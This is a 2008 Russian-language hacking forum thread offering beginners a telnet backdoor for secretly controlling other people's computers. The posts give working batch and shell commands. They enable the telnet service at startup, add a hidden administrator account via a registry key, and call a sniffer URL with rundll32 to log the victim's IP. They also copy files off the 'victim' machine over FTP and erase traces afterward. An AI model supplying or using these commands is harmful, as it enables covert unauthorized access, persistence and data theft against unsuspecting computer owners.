Telnet Backdoor[video] (Только для новичков!)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 16:15:45.870000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Для тех кто не знает что такое backdoor) - Если вы хотите управлять чужим компьютером, чтобы тот об этом не догадывался то это видео для вас.
http://ifolder.ru/7861242
http://depositfiles.com/files/7495148
Размер архива 1.5 мб.
Приятного просмотра.
Просьба отписыватся в теме после просмотра видео.
UPD: Для тех кто хочет узнать ip адрес жертвы не спрашивая вот единственное что пришло мне в голову -
Добавте в конец исходника строчку
rundll32 url.dll, FileProtocolHandler http://адресс.на.сниффер
и проверяйте логи снифа.
Telnet\SSH клиент для мобильника -
Скачать v.1.6.0 full (MIDP-2.0) от 04.11.07 (118,32кБ)
jad
Скачать v.1.6.0 full (MIDP-1.0) от 04.11.07 (115,68кБ)
jad
UPD:
Замените последнюю строчку (начинается на REG ADD) в файле telnet.bat на следущую:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t REG_DWORD /d 0 /f И созданная бат-файлом учётная запись станет нивидимой.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 16:40:33.426666
|
|
|
andyHouse
Сообщений: 184
Оценки: 0
Присоединился: 2008-04-04 12:48:02.700000
|
Сразу вопрос!
Как после того как подключился - скинуть батник в папку windows, и забить его в автозагрузку???
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 16:50:34.023333
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Выложить батник на фтп сервер и скачать его оттуда. Потом -
copy D:\..\..\..\file.bat D:\..\..\..\file.bat
Первый путь "Откуда" Второй путь "куда" Насчет автозагрузки. Он уже в автозагрузке :)
sc config tlntsvr start= auto
эта строка в батнике за это отвечает.
Насчет папки WINDOWS можно использовать %windir% (это путь к папке винды и не важно на каком диске она находится.)
UPD: Пожалуй выложу список переменных окружения:
%ALLUSERSPROFILE% Локальная Возвращает размещение профиля <All Users>.
%APPDATA% Локальная Возвращает используемое по умолчанию размещение
данных приложений.
%CD% Локальная Возвращает путь к текущей папке.
%CMDCMDLINE% Локальная Возвращает строку команд, с помощью которой был
запущен данный экземпляр Cmd.exe.
%CMDEXTVERSION% Системная Возвращает номер версии текущих расширений
обработчика команд.
%COMPUTERNAME% Системная Возвращает имя компьютера.
%COMSPEC% Системная Возвращает путь к исполняемой командной оболочке.
%DATE% Системная Возвращает текущие данные. Использует тот же формат,
что и команда date /t. Создается командой Cmd.exe. Дополнительные сведения о
команде date см. в разделе Date.
%ERRORLEVEL% Системная Возвращает код ошибки последней
использовавшейся команды. Значение, не равное нуля, обычно указывает на
наличие ошибки.
%HOMEDRIVE% Системная Возвращает имя диска локальной рабочей станции,
связанного с основным каталогом пользователя. Задается на основании
расположения основного каталога. Основной каталог пользователя указывается в
оснастке <Локальные пользователи и группы>.
%HOMEPATH% Системная Возвращает полный путь к основному каталогу
пользователя. Задается на основании расположения основного каталога.
Основной каталог пользователя указывается в оснастке <Локальные пользователи
и группы>.
%HOMESHARE% Системная Возвращает сетевой путь к общему основному
каталогу пользователя. Задается на основании расположения основного
каталога. Основной каталог пользователя указывается в оснастке <Локальные
пользователи и группы>.
%LOGONSEVER% Локальная Возвращает имя контроллера домена, который
проверял подлинность текущей сессии.
%NUMBER_OF_PROCESSORS% Системная Задает количество процессоров,
установленных на компьютере.
%OS% Системная Возвращает имя операционной системы. При использовании
Windows 2000 имя операционной системы отображается как Windows_NT.
%PATH% Системная Указывает путь поиска для исполняемых файлов.
%PATHEXT% Системная Возвращает список расширений файлов, которые
рассматриваются операционной системой как исполняемые.
%PROCESSOR_ARCHITECTURE% Системная Возвращает архитектуру процессора.
Значения: x86, IA64.
%PROCESSOR_IDENTFIER% Системная Возвращает описание процессора.
%PROCESSOR_LEVEL% Системная Возвращает номер модели процессора,
установленного на компьютере.
%PROCESSOR_REVISION% Системная Возвращает номер модификации
процессора.
%PROMPT% Локальная Возвращает параметры командной строки для текущего
интерпретатора. Создается командой Cmd.exe.
%RANDOM% Системная Возвращает произвольное десятичное число от 0 до
32767. Создается командой Cmd.exe.
%SYSTEMDRIVE% Системная Возвращает имя диска, содержащего корневой
каталог Windows XP (т. е. системный каталог).
%SYSTEMROOT% Системная Возвращает размещение системного каталога
Windows XP.
%TEMP% и %TMP% Системная и пользовательская Возвращает временные
папки, по умолчанию используемые приложениями, которые доступны
пользователям, выполнившим вход в систему. Некоторые приложения требуют
переменную TEMP, другие - переменную TMP.
%TIME% Системная Возвращает текущее время. Использует тот же формат,
что и команда time /t. Создается командой Cmd.exe. Дополнительные сведения о
команде time см. в разделе Time.
%USERDOMAIN% Локальная Возвращает имя домена, содержащего список
учетных записей пользователей.
%USERNAME% Локальная Возвращает имя пользователя, выполнившего вход в
систему.
%USERPROFILE% Локальная Возвращает размещение профиля для текущего
пользователя.
%WINDIR% Системная Возвращает размещение каталога операционной
системы.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 17:05:00.950000
|
|
|
Viper[o_O]k
Сообщений: 163
Оценки: 0
Присоединился: 2008-08-16 09:31:45.666666
|
А может кто перезалить ? А то скачать не могу :( // Спасибо, скачал
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 17:10:16.813333
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Добавил ссыль на депозит.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 17:15:51.643333
|
|
|
w1N
Сообщений: 8
Оценки: 0
Присоединился: 2008-08-20 11:09:11.370000
|
хPurg3n, респект, видио всегда лучше текстов:-)
Вопросег… а точнее просьба… по-подробнее описать команды, которые пишешь в телнете.
ЗЫ. +2 от меня
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 17:21:54.486666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Смысле описать? Можно использовать любые команды командного процессра прошу прощения за тавтологию. Что конкретно непонятно?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 17:30:37.650000
|
|
|
w1N
Сообщений: 8
Оценки: 0
Присоединился: 2008-08-20 11:09:11.370000
|
команды когда ты присоединяешься к фтп. Команда /ftp, а потом К t3ln3t…это путь к файлу или адрес фтп? и что значит "К" и в какой расскладке он написан? Что значат команды dir и cd?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 17:35:28.430000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
команда "ftp" открывает фтп клиент. Потом я ввожу "open" (или просто "o"), командная строка запрашивает адрес фтп сервера, его я собственно и ввожу. команда "dir" это листинг файлов и каталогов в директории, cd - переход в директорию.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 19:13:10.140000
|
|
|
trofik
Сообщений: 56
Оценки: 0
Присоединился: 2008-08-13 18:19:10.860000
|
вот я разместил его где нибудь, скачали его а как его ip узнать?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 19:24:09.130000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Социальная инженерия :) спросишь :) Я же сказал что это примитив. Единственное что я могу посоветовать средствами bat дак это вписать ещё одну строчку -
rundll32 url.dll, FileProtocolHandler http://адресс.на.сниффер
И уже в логах сниффера смотриш айпи адрес запустившего.
Могу посоветовать сниффер - http://na-s.ru
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 19:30:37.536666
|
|
|
trofik
Сообщений: 56
Оценки: 0
Присоединился: 2008-08-13 18:19:10.860000
|
спасибо[sm=em62.gif]
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-26 23:31:41.036666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Первый пост обновлен.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 00:00:40.923333
|
|
|
Calibus
Сообщений: 19
Оценки: 0
Присоединился: 2008-07-04 14:00:59.133333
|
quote:
ORIGINAL: хPurg3n
Первый пост обновлен.
up наверное называется?:D
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 12:21:51.416666
|
|
|
Dread
Сообщений: 14
Оценки: 0
Присоединился: 2008-08-26 12:55:35.963333
|
Откуда ты узнал что пинч ты канешна заливал на свою тачку) ты знал где он находиться. А как узнать куда файл скачался у жертвы?
И можно ещё простенькое видео по фар менеджеру)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 16:29:45.063333
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Файлы с фтп закачиваются в папку %windir%\DOCUME~1\%username%
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 17:54:57.816666
|
|
|
Dread
Сообщений: 14
Оценки: 0
Присоединился: 2008-08-26 12:55:35.963333
|
также напиши плх батник который удаляет файл из автозагрузки удаляет учётку и т.д…вообщем заметает за собой все следы) полностью
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 18:06:15.320000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: Dread
также напиши плх батник который удаляет файл из автозагрузки удаляет учётку и т.д…вообщем заметает за собой все следы) полностью
net user admin /del
sc config tlntsvr start= disabled
net stop Telnet
Вот пожалуйста. Ещё вопросы?)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 18:24:03.826666
|
|
|
Dread
Сообщений: 14
Оценки: 0
Присоединился: 2008-08-26 12:55:35.963333
|
спс, плз сними видео с фар менеджером. спешал фо ми)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 18:43:39.540000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Cкачай фар на комп жертвы и пропиши
%systemdrive%\DOCUME~1\%username%\Far.exe
Тут и без видео понятно.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 19:26:47.633333
|
|
|
Dgedit
Сообщений: 131
Оценки: 0
Присоединился: 2007-02-04 15:07:37.163333
|
А вот интересно, служба telnet в системе Windows изначально на автозапуске? и как она себя будет вести если она на ручном , а к этой системе с помощью telneta попытаться присоединитсья.
И еще один вопросик : опять же в свежеустановленной винде по умолчанию есть уже пользователи telneta ( с логином и паролем)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 19:34:03.290000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Изначально нет, по дефолту sc config tlntsvr start= disabled стоит. Да изначально есть пользователь для телнета, и это удаленный помошник, это запись для работников microsoft (под последним предложением не подписываюсь, но вроде это так).
quote:
и как она себя будет вести если она на ручном , а к этой системе с помощью telneta попытаться присоединитсья.
Непонял вопроса)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 19:40:41.903333
|
|
|
Dgedit
Сообщений: 131
Оценки: 0
Присоединился: 2007-02-04 15:07:37.163333
|
Ну смотри в винде для служб есть три варианта:
- или автозапуск с системой
- ручной
- отключена
Если она отключена то ты с помощью telneta уже не подклюючишься как я понял.
Если на автозапуске то подключишься.
А вот если на ручном: если я ее сам у себя на компе запускаю то она включится и будет работать, а если она на ручном, я эту службу не запускал а ко мне пытаются с помощью телнета удаленно подключиться?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 19:51:18.360000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Не подключится.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 20:02:31.976666
|
|
|
SeWa_67_RuS
Сообщений: 185
Оценки: 0
Присоединился: 2008-05-23 19:00:34.463333
|
красав4ик
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 21:50:27.156666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
В первый пост добавлены телнет клиенты для мобильных телефонов.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 23:01:29.216666
|
|
|
Dgedit
Сообщений: 131
Оценки: 0
Присоединился: 2007-02-04 15:07:37.163333
|
Слушай а еще подскажи - подлючаешься ты к удаленному компу по протоколу Telnet, но он не шифруется. Есть какие-нибудь варианты для доступа к этому компу, но чтобы трафик шифровался?
И еще подскажи: подключится к компу по telnet , но через socks-прокси можно, да?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 23:12:25.126666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Хочеш шифрования? Юзай SSH. Через прокси подключится можно. Юзай FreeCap.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 23:16:34.020000
|
|
|
Dgedit
Сообщений: 131
Оценки: 0
Присоединился: 2007-02-04 15:07:37.163333
|
Но для SSH нужен SSH сервер на удаленном компе, правильно?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-27 23:47:03.766666
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
Да,правильно. Но на дальнейшие вопросы ответит либо ктото другой, либо я но завтра (потому что пишу с телефона)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-28 08:32:27.903333
|
|
|
Dgedit
Сообщений: 131
Оценки: 0
Присоединился: 2007-02-04 15:07:37.163333
|
Слушай я запустил твой батник на своем компе, так у меня теперь (стоит ХР) появился новый пользователь с логином админ, это ведь палево, если я кому-то скину твой батник и он его запустит он же заметит что новый пользователь появился
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-28 10:52:54.593333
|
|
|
жжж^слоник^жжот
Сообщений: 1806
Оценки: 10
Присоединился: 2008-05-20 11:08:35.946666
|
quote:
ORIGINAL: Dgedit
Слушай я запустил твой батник на своем компе, так у меня теперь (стоит ХР) появился новый пользователь с логином админ, это ведь палево, если я кому-то скину твой батник и он его запустит он же заметит что новый пользователь появился
Попробуй ему после этого скинуть батник указанный сверху
net user admin /del
sc config tlntsvr start= disabled
net stop Telnet
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-28 16:08:14.073333
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: жжж^слоник^жжот
quote:
ORIGINAL: Dgedit
Слушай я запустил твой батник на своем компе, так у меня теперь (стоит ХР) появился новый пользователь с логином админ, это ведь палево, если я кому-то скину твой батник и он его запустит он же заметит что новый пользователь появился
Попробуй ему после этого скинуть батник указанный сверху
net user admin /del
sc config tlntsvr start= disabled
net stop Telnet
Это конечно выход, но это выход навсегда :) По идее сам бат файл из архива предусматривает удаление учетки admin из экрана выбора пользователей, но это в идеале, на практике видимо чтото не получилось (извиняюсь с реестром я на вы). Если в эту тему посмотрят люди хорошо знакомые с реестром то большая просьба обьяснить где я допустил ошибку -
REG ADD "HKLM\SOFTWARE\Microsoft\Win
dowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /v admin /t reg_d
word /d 0
Заранее благодарен.
UPD:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t REG_DWORD /d 0 Вот это добавьте в конец бат файла. Проблемы иссякнут.
Достаточно было покурить маны)
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 08:38:44.863333
|
|
|
Lipovbi
Сообщений: 1
Оценки: 0
Присоединился: 2008-08-30 08:03:47.723333
|
Привет всем!!!
Посмотрел видео. СПС хPurg3n, но я нашол ошибку:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t REG_DWORD /d 0
не хватает команды: /f или y
Вот как должно быть:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t reg_dword /d 0 /f
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 11:00:44.073333
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: Lipovbi
Привет всем!!!
Посмотрел видео. СПС хPurg3n, но я нашол ошибку:
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t REG_DWORD /d 0
не хватает команды: /f или y
Вот как должно быть:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin" /t reg_dword /d 0 /f
Да согласен так будет лучше, но она необходима только для того если будут запускать второй раз, чтобы не спрашивало разрешения перезаписать или нет. Спасибо.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 12:38:34.533333
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
у меня вопрос: как скопировать фаял с компа жертвы?
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 12:40:51.486666
|
|
|
ido46od
Сообщений: 71
Оценки: 0
Присоединился: 2008-07-17 21:31:29.910000
|
а можете объяснить что делает команда chcp?
еще думаю так будет хорошо:
net localgroup Администраторы admin /add
net localgroup Administrators admin /add
потому что может у кого то группы Администраторы не будет, сам проверил у одного, ошибка, а Administrators пошел.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 12:51:46.990000
|
|
|
хPurg3n
Сообщений: 250
Оценки: 0
Присоединился: 2008-06-08 22:12:09.743333
|
quote:
ORIGINAL: ido46od
а можете объяснить что делает команда chcp?
еще думаю так будет хорошо:
net localgroup Администраторы admin /add
net localgroup Administrators admin /add
потому что может у кого то группы Администраторы не будет, сам проверил у одного, ошибка, а Administrators пошел.
chcp 1251 кодировку меняет на windows-1251 это нужно для адекватного занесения пользователя в группу Администраторы.
quote:
у меня вопрос: как скопировать фаял с компа жертвы?
В режиме фтп это команда put D:\*\*\*.*
Где D:\*\*\*.* путь к файлу.
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 13:00:15.276666
|
|
|
ido46od
Сообщений: 71
Оценки: 0
Присоединился: 2008-07-17 21:31:29.910000
|
хPurg3n спасибо все понял, и спасибо за скрипт +1
|
|
|
|
|
RE: Telnet Backdoor[video] (Только для новичков!) - 2008-08-30 13:11:32.873333
|
|
|
Mirk
Сообщений: 199
Оценки: 0
Присоединился: 2008-08-18 22:04:06.090000
|
спс
|
|
|
|
|
|
